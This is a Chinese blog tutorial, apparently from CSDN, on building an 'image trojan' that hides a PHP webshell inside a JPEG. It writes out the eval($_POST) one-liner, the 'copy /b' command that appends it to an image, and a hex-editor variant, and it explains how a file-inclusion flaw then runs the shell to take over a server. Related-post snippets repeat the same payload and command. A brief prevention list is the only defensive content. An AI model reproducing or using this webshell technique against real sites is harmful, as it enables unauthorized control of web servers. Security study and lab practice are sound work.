图片木马

最新推荐文章于 2022-10-24 20:01:19 发布
最新推荐文章于 2022-10-24 20:01:19 发布
阅读量2.9k 收藏 23
点赞数 4
分类专栏: 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52250313/article/details/117132187
版权

文章目录

图片木马

顾名思义,看上去很像图片的木马。

木马必然是个可执行的程序文件,其后缀名是“exe”。

原理

以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。

条件

  • 图片能够正常显示
  • 包含可执行的恶意代码

漏洞防范

  • 尽量使用最新的web服务器版本

  • 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限)

  • 可以的话,对图片进行二次处理,把木马文件过滤掉

  • 永远不要相信用户的输入

制作方法

  • copy法(这种方法需要用到命令行窗口)

首先,准备好jpg文件和php文件

在这里插入图片描述

php文件内容:<?php eval($_POST['hack'])?>

在这里插入图片描述

使用下面的命令来生成图片木马

copy hack.jpg/b+hack.php/a hehehe.jpg

其中,a表示ASCII码文件,b表示二进制文件

在这里插入图片描述

图片木马制作完成

在这里插入图片描述

对比原图片代码和木马图片代码

在这里插入图片描述

可知,恶意代码已嵌入原图

  • 二进制编辑器法(使用二进制编辑器工具)

这里我使用到的是Editor

打开编辑器后,打开文件

在这里插入图片描述

在任意位置插入木马语句**<?php eval($_POST['hack'])?>**

在这里插入图片描述

保存图片,对比查看原图和木马图片

在这里插入图片描述

  • 其他方法:利用Photoshop插入木马语句,渲染绕过等……

小生不才,以后慢慢再学

阿刁〇하
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
php检测图片木马多进制编程实践
01-20
前不久,我申请加入了某开源组织,他们要我写一个功能用来检测图片中是否有木马脚本。 其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序。 经过几番思索之后,决定从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,我灵机一动,写了以下这个上传类。最终通过了组织测验。呵呵 现在把它拿出来给大家分享,有什么不好的地方,还请指正! [email protected]; 复制代码 代码如下: <?php /** +—————————————————————————— * Upload 文件上传类 +—————————————————————————
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3154
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
简单图片木马的生成与利用
Deeeelete的博客
02-08 8670
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 6793
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 8551
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马的图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
文件上传图片木马执行之[SUCTF 2019]CheckIn1
qq_58970968的博客
04-14 2135
参考博文:BUUCTF__[SUCTF 2019]CheckIn_题解_风过江南乱的博客-CSDN博客 上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能含有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装; 图片木马的制作,不多说;这里上传jpg木马之后,怎么执行里面的木马呢; 目前学到的有两种方法: 1.在apache中,可以用.htacess文件来实现,可这道题也被正则了 2.用.user.ini (知识点在参考里面也有);大概就.
一句话图片木马
热门推荐
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
【WEB攻防】图片木马的利用
weixin_45983744的博客
02-15 1万+
交流Q群:876554035 一,图片木马原理 图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。 二.工具及环境 DVWA靶场环境 010Editor 中国菜刀 三.具体步骤 1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。 图一 登陆界面 图二 选择安全级别,进入 2.利用01...
ASP防止图片木马上传的代码
10-28
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
特效图片木马旋转显示
12-28
JS H5特效图片木马旋转显示
ASP下检测图片木马的函数代码
10-28
检测ASP图片木马的函数。由于FSO无法读取客户端文件的内容,所以只能在文件上传到服务器后再打开文件进行内容检查。
asp防止上传图片木马原理解析
01-03
首先判断文件大小: if file.filesize<10 then Response.Write([removed]alert('您没有选择上传文件')[removed]) Response.Write([removed]history.go(-1)[removed]) Response.End() ...
后端开发是一个涉及广泛技术和工具的领域.docx
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
三菱PLC通讯程序实例
04-30
FX5U PLC作为主、从站的通讯方式程序实例,以及包含详细说明文件...
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
最新发布
04-30
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
java 如何阻止图片木马
06-13
Java中防止图片木马的主要方法是通过对上传的图片进行严格的检查和过滤,以防止恶意代码的注入。以下是一些常见的防止图片木马的方法: 1. 对上传的图片进行类型和大小的检查,只允许上传指定类型和大小的图片。 2. 对上传的图片进行病毒扫描,以确保图片中不包含恶意代码。 3. 对上传的图片进行二次渲染,以去除其中可能存在的恶意代码。 4. 对上传的图片进行压缩和优化,以减少图片中的冗余信息和可能存在的恶意代码。 5. 对上传的图片进行加密,以确保图片中的信息不被恶意代码所窃取。 总之,防止图片木马需要从多个角度进行考虑和保护。建议您在开发时使用第三方的安全框架或库,以提高代码的安全性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值